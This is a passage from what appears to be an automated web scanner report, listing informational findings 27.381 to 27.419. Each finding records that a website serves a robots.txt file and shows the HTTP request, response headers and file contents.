p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
ID: 50
Date: Wed, 04 May 2011 03:55:24 GMT
Connection: close
Content-Length: 110

User-Agent: *
Disallow: /Maintenance/
Disallow: /Pages/NNHomePage.aspx
Disallow: /Pages/NPHomePage.aspx


27.381. http://www.corvetteactioncenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.corvetteactioncenter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.corvetteactioncenter.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:08:38 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
Last-Modified: Wed, 14 Apr 2010 15:52:43 GMT
ETag: "16c808e-218-484345e5a88c0"
Accept-Ranges: bytes
Content-Length: 536
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin
Disallow: /advertise
Disallow: /avantgo
Disallow: /cgi-bin
Disallow: /dealerrank
Disallow: /events/cruisefest/registration/
Disallow: /forums/admincp/
Disallow: /gbook
D
...[SNIP]...

27.382. http://www.costadelmar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.costadelmar.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.costadelmar.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 29 Aug 2006 16:23:29 GMT
Accept-Ranges: bytes
ETag: "fe75687687cbc61:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:34:48 GMT
Connection: close
Content-Length: 179

User-agent: *
Disallow: /admin/
Disallow: /css/
Disallow: /FCKeditor/
Disallow: /flash/
Disallow: /images/
Disallow: /includes/
Disallow: /javascript/
Disallow: /services/

27.383. http://www.costcentral.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.costcentral.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.costcentral.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:42:05 GMT
Server: Apache/2.2.16 (EL)
Last-Modified: Wed, 10 Mar 2010 21:02:53 GMT
ETag: "1178c9a-117-481789f267940"
Accept-Ranges: bytes
Content-Length: 279
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /addtocart.php
Disallow: /cart.php
Disallow: /account.php
Disallow: /orderhistory.php
Disallow: /pu_realtimeavail.php
Disallow: /pu_stocknotify.php

Sitemap: http://www
...[SNIP]...

27.384. http://www.countercurrents.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.countercurrents.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.countercurrents.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:57:24 GMT
Server: Apache
Last-Modified: Sat, 19 Dec 2009 03:42:19 GMT
ETag: "39f74ca-19-47b0ca4a5dcc0"
Accept-Ranges: bytes
Content-Length: 25
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /



27.385. http://www.countryplans.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.countryplans.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.countryplans.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:52:55 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.6 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 02 Oct 2010 23:16:03 GMT
ETag: "1f40cd-47-491aa7eb372c0"
Accept-Ranges: bytes
Content-Length: 71
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow:

27.386. http://www.countrysidemag.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.countrysidemag.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.countrysidemag.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:57:23 GMT
Server: Apache
Last-Modified: Mon, 21 Dec 2009 04:32:07 GMT
ETag: "2d308c9-fb-4b2efa47"
Accept-Ranges: bytes
Content-Length: 251
Connection: close
Content-Type: text/plain

# robots.txt file for www.countrysidemag.com

User-agent: *
Disallow: /ads/
Disallow: /adv/
Disallow: /art/
Disallow: /cgi-bin/
Disallow: /cp/
Disallow: /err/
Disallow: /images/
Disallow: /images1/
Di
...[SNIP]...

27.387. http://www.couponfeed.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.couponfeed.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.couponfeed.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:12:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 09 Feb 2010 23:29:02 GMT
ETag: "4300ab5-d3-47f33486ceb80"
Accept-Ranges: bytes
Content-Length: 211
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
Disallow: /cgi-bin/
Disallow: /wp-includes/
Disallow: /wp-admin/
Disallow: /wp-content/
Disallow: /stats/
Disallow: /feed/
Disallow: /images/
Disallow: /go/
Disallow
...[SNIP]...

27.388. http://www.couponrefund.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.couponrefund.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.couponrefund.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:38:17 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Cache-Control: max-age=604800
Last-Modified: Tue, 01 Mar 2011 04:32:08 GMT
ETag: "30020b93-81-4d6c76c8"
Accept-Ranges: bytes
Content-Length: 129
Connection: close
Content-Type: text/plain

User-agent: *

Allow: /
Disallow: /cgi-bin/
Disallow: /admin/
Disallow: /dev/
Sitemap: http://www.couponrefund.com/sitemap.xml.gz

27.389. http://www.coupons2grab.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coupons2grab.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coupons2grab.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:41:34 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 05 Oct 2010 12:51:09 GMT
ETag: "5e0019b-96-491de1d688940"
Accept-Ranges: bytes
Content-Length: 150
Connection: close
Content-Type: text/plain

User-agent: linksmanager_bot
Disallow: /
User-agent: *
Disallow: /grab.php
Disallow: /productdesc.php
Disallow: /moreinfo.php
Disallow: /howtoget.php

27.390. http://www.cowboom.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cowboom.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cowboom.com

Response

HTTP/1.1 200 OK
Set-Cookie: acecookie=R1194250388; path=/
Cache-Control: max-age=28800
Content-Length: 340
Content-Type: text/plain
Content-Location: http://www.cowboom.com/robots.txt
Last-Modified: Tue, 02 Feb 2010 23:12:58 GMT
Accept-Ranges: bytes
ETag: "68729425da4ca1:1e19"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:05:53 GMT
Connection: close
Set-Cookie: acecookie=R1424773594; path=/

User-Agent: *
Disallow: /act/
Disallow: /cb_process/
Disallow: /styles/
Disallow: /javascript/
Disallow: /fckeditor/
Disallow: /sites/
Disallow: /contact.cfm
Disallow: /sites/Cowboom/termsOfUs
...[SNIP]...

27.391. http://www.cpllabs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cpllabs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cpllabs.com

Response

HTTP/1.1 200 OK
Content-Length: 869
Content-Type: text/plain
Last-Modified: Mon, 03 Aug 2009 10:16:24 GMT
Accept-Ranges: bytes
ETag: "afa5a1742314ca1:45e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:15:39 GMT
Connection: close

### BEGIN FILE ###
#
# allow-all
#
#
# The use of robots or other automated means to access the sonichealthcare site
# without the express permission of sonichealthcare is strictly prohibited.
...[SNIP]...

27.392. http://www.cptryon.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cptryon.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cptryon.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:18:56 GMT
Server: Apache/2.2.17
Last-Modified: Fri, 27 Sep 2002 04:39:44 GMT
ETag: "28-3ab99b4ee6400"
Accept-Ranges: bytes
Content-Length: 40
Connection: close
Content-Type: text/plain

User-agent: Googlebot-ImageDisallow: /

27.393. http://www.craigslist.at/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.craigslist.at
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.craigslist.at

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Fri, 18 Dec 2009 01:10:13 GMT
Accept-Ranges: bytes
Date: Wed, 04 May 2011 03:25:31 GMT
Vary: Accept-Encoding
Content-Length: 665
Content-Type: text/plain
Server: Apache
X-Pad: avoid browser bug

##############################
# Exclude robots from these

User-agent: YahooFeedSeeker
Disallow: /forums
Disallow: /res/
Disallow: /post
Disallow: /email.friend
Disallow: /reply
Disallow: /?flagCode

...[SNIP]...

27.394. http://www.craigsolomon.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.craigsolomon.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.craigsolomon.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:18:42 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: COOKIE=10.5.16.244.1304475522679807; path=/
Set-Cookie: referrer=; path=/
Set-Cookie: t=d4faef8075f411e0b8d10015c5e70815; path=/
Set-Cookie: referrer=www.craigsolomon.net; path=/
Vary: Accept-Encoding,User-Agent
Cartoon: aalander5
Content-Length: 75
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

Sitemap: http://www.craigsolomon.net/Sitemap.xml


27.395. http://www.craniumfitteds.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.craniumfitteds.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.craniumfitteds.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:11:49 GMT
Server: Apache
Last-Modified: Fri, 25 Feb 2011 06:02:18 GMT
ETag: "1460395-17-49d15128dce80"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
allow: /

27.396. http://www.crazy-tattoo-designs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crazy-tattoo-designs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.crazy-tattoo-designs.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:55:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 02 May 2011 22:53:27 GMT
ETag: "6130001-18-4a252e43c07c0"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.397. http://www.crazyblogs.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crazyblogs.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.crazyblogs.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:13:38 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.9
Last-Modified: Mon, 19 Apr 2010 10:44:15 GMT
ETag: "5fde7c-18-4bcc33ff"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Allow: /


27.398. http://www.creativeminorityreport.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creativeminorityreport.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.creativeminorityreport.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Expires: Wed, 04 May 2011 23:25:07 GMT
Date: Tue, 03 May 2011 23:25:07 GMT
Last-Modified: Tue, 03 May 2011 22:57:14 GMT
ETag: "b34c02ba-2aeb-451e-a6ec-cf5d8b41b59e"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400, must-revalidate, proxy-revalidate
Age: 16449

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /search
Disallow: /related-content.g
Disallow: /related_content_helper.html

Sitemap: http://www.creativeminorityreport.com/feeds/p
...[SNIP]...

27.399. http://www.credentialsops.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.credentialsops.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.credentialsops.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:29:29 GMT
Server: Apache
Last-Modified: Sat, 25 Jul 2009 03:12:47 GMT
ETag: "105b4-27-185b29c0"
Accept-Ranges: bytes
Content-Length: 39
Connection: close
Content-Type: text/plain; charset=windows-1252

# go away
User-agent: *
Disallow: /

27.400. http://www.credit-land.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.credit-land.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.credit-land.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 19 Oct 2010 08:39:45 GMT
ETag: "127513e-d3-492f43c1c3640"
Accept-Ranges: bytes
Content-Length: 211
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /apply.php
Disallow: /apply_search.php
Disallow: /holidays/
Disallow: /fall-shopping/
Disallow: /new-cards/
Disallow: /details/
Sitemap: http://www.credit-land.com/sitem
...[SNIP]...

27.401. http://www.creditadvisors.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditadvisors.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.creditadvisors.com

Response

HTTP/1.1 200 OK
Content-Length: 797
Content-Type: text/plain
Content-Location: http://www.creditadvisors.com/robots.txt
Last-Modified: Fri, 05 Feb 2010 18:40:51 GMT
Accept-Ranges: bytes
ETag: "4ee22abe92a6ca1:14d5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:45:56 GMT
Connection: close

User-Agent: *
#Standard Directories
Disallow: /_                #Should disallow all files/directories that begin with an underscore
Disallow: /CGI-BIN/            #cgi-bin directory - not used
Disallow: /_error/            #E
...[SNIP]...

27.402. http://www.creditimprovers.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditimprovers.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.creditimprovers.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:51 GMT
Server: Apache
Last-Modified: Fri, 25 Jun 2010 00:01:38 GMT
ETag: "92653d-1d-489cf7996bc80"
Accept-Ranges: bytes
Content-Length: 29
Connection: close
Content-Type: text/plain
Set-Cookie: Coyote-2-c0a88791=a0c0023:0; path=/

User-agent: *
Disallow: /lp/

27.403. http://www.cricutrewards.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cricutrewards.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cricutrewards.com

Response

HTTP/1.1 200 OK
Content-Length: 2590
Content-Type: text/plain
Last-Modified: Fri, 02 May 2008 22:13:52 GMT
Accept-Ranges: bytes
ETag: "050a6cda1acc81:808"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:01:44 GMT
Connection: close

User-agent: *
Disallow: /ASPDNSFCommon/
Disallow: /ASPDNSFEncrypt/
Disallow: /ASPDNSFGateways/
Disallow: /ASPDNSFPatterns/
Disallow: /ASPDNSFQuickBooks/
Disallow: /bin/
Disallow: /categorydescr
...[SNIP]...

27.404. http://www.critter-repellent.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.critter-repellent.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.critter-repellent.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:46:56 GMT
Server: Apache
Last-Modified: Tue, 05 Apr 2011 19:16:30 GMT
ETag: "2e-b6a53f80"
Accept-Ranges: bytes
Content-Length: 46
Vary: Accept-Encoding
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Cache-Control: max-age=604800
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /what
Disallow:/mm5



27.405. http://www.croatiantimes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.croatiantimes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.croatiantimes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:46:45 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.5.1 PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ruby/1.2.6 Ruby/1.8.7(2008-08-11) mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Wed, 30 Sep 2009 20:38:56 GMT
ETag: "11a538-ca-474d1850c3800"
Accept-Ranges: bytes
Content-Length: 202
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /admin/
Disallow: /admin-pictures/
Disallow: /cgi-bin/
Disallow: /documents/
Disallow: /export/
Disallow: /pic/
Disallow: /thumbnails/
Disallow: /uploads/
Disallow: /webalizer/
...[SNIP]...

27.406. http://www.cryosites.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cryosites.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cryosites.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:33:58 GMT
Server: Apache
Last-Modified: Sun, 27 Jul 2008 22:50:06 GMT
ETag: "20040e8a-84-488cfb9e"
Accept-Ranges: bytes
Content-Length: 132
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /includes/
Disallow: /data/
Disallow: /common/
Sitemap: http://cryosites.com/sitemap.xml

27.407. http://www.csa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.csa.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:42:15 GMT
Server: Apache/2.2.6 (Unix) PHP/5.1.2 proxy_html/2.5
Last-Modified: Thu, 05 Apr 2007 14:32:30 GMT
ETag: "1c016-5c-70d49b80"
Accept-Ranges: bytes
Content-Length: 92
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /htbin/
Disallow: /cgi-bin/
Disallow: /ids_admin/
Disallow: /ids70/

27.408. http://www.csaceliacs.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csaceliacs.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.csaceliacs.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:08:24 GMT
Server: Apache
Vary: Accept-Encoding
Last-Modified: Mon, 11 Sep 2006 15:49:58 GMT
ETag: "65df34-24-450585a6"
Accept-Ranges: bytes
Content-Length: 36
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /committees/

27.409. http://www.customclassictrucks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customclassictrucks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.customclassictrucks.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 00:44:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4qwz0s45qn5kvxzxbgwkni45; path=/; HttpOnly
Set-Cookie: UserPuid=2334585768020235242; domain=customclassictrucks.com; expires=Wed, 04-May-2061 00:44:41 GMT; path=/
Cache-Control: private
Content-Type: text/plain
Content-Length: 293

User-agent: *
Disallow: /bin/
Disallow: /aspnet_client/
Disallow: /redir/
Disallow: /controls/
Disallow: /srv/
Disallow: /*?
Disallow: /popup/
Disallow: /dropdownxml/
Disallow: /*.aspx$
Disa
...[SNIP]...

27.410. http://www.customweather.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customweather.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.customweather.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:58:05 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch
Last-Modified: Sun, 18 Jul 2010 03:02:18 GMT
ETag: "20ddc191-130-48ba0ae0da280"
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding
Content-Type: text/plain
Via: 1.0 www.customweather.com
X-Server-Name: lb2
Connection: close

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.411. http://www.cutco.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cutco.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cutco.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:16:50 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 06 Oct 2010 13:31:54 GMT
ETag: "82814b-5d-491f2ccfba680"
Accept-Ranges: bytes
Content-Length: 93
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /customer/serviceRequest.jsp
Disallow: /company/skill9.jsp
Allow: /


27.412. http://www.cute-mary.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cute-mary.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cute-mary.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:07:13 GMT
Server: Apache/1.3.36 (Unix) PHP/5.1.5
Last-Modified: Sun, 17 Jan 2010 10:01:00 GMT
ETag: "149c33a-1b-4b52dfdc"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-Agent: *
Allow: /


27.413. http://www.cute-sandy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cute-sandy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cute-sandy.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:55:22 GMT
Server: Apache/1.3.36 (Unix) PHP/5.1.5
Last-Modified: Sun, 17 Jan 2010 10:01:15 GMT
ETag: "2dc037-1b-4b52dfeb"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-Agent: *
Allow: /


27.414. http://www.cutest-baby-shower-ideas.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cutest-baby-shower-ideas.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cutest-baby-shower-ideas.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:02:15 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.cutest-baby-shower-ideas.com/wDNBdM5Z.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disall
...[SNIP]...

27.415. http://www.cyclepedia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cyclepedia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cyclepedia.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:47:46 GMT
Server: Apache/2.2.17
X-Pingback: http://www.cyclepedia.com/xmlrpc.php
Content-Length: 160
Connection: close
Content-Type: text/plain; charset=utf-8

# Added by Link Alias Generator (LAG) module
User-agent: *
Disallow: /go/
# End LAG

User-agent: *
Disallow:

Sitemap: http://www.cyclepedia.com/sitemap.xml.gz

27.416. http://www.dailycomedy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailycomedy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dailycomedy.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:02:54 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 26 Mar 2010 03:58:52 GMT
ETag: "901-20e-2e713700"
Accept-Ranges: bytes
Content-Length: 526
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /
Disallow: /joke/*/*
Disallow: /videos/*/*
Disallow: /cleanon
Sitemap: http://www.dailycomedy.com/topic_sitemap.xml
Sitemap: http://www.dailycomedy.com/joke_sitemap4.xml
S
...[SNIP]...

27.417. http://www.dailycontributor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailycontributor.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dailycontributor.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:52:57 GMT
Server: Apache
Last-Modified: Mon, 25 May 2009 14:53:27 GMT
ETag: "4ba84cb-13d-46abdc5d0c7c0"
Accept-Ranges: bytes
Content-Length: 317
Connection: close
Content-Type: text/plain; charset=UTF-8

Sitemap: http://dailycontributor.com/sitemap.xml

User-agent: *
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /feed/
Disallow: /trackback/
Disallow: /cgi-bin/
Disallow: /hi/
Disallow: /ro/
Di
...[SNIP]...

27.418. http://www.dailydemocrat.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailydemocrat.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dailydemocrat.com

Response

HTTP/1.0 200 OK
Content-Length: 120
Content-Type: text/plain
Last-Modified: Wed, 05 Aug 2009 22:15:35 GMT
Accept-Ranges: bytes
ETag: "80ddf411a16ca1:3044"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Expires: Wed, 04 May 2011 01:12:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:12:58 GMT
Connection: close

User-agent: *
Disallow: /portlet/
Disallow: /circare/
Crawl-delay: 5

Sitemap: http://www.dailydemocrat.com/sitemap.xml

27.419. http://www.dailyjournalonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailyjournalonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
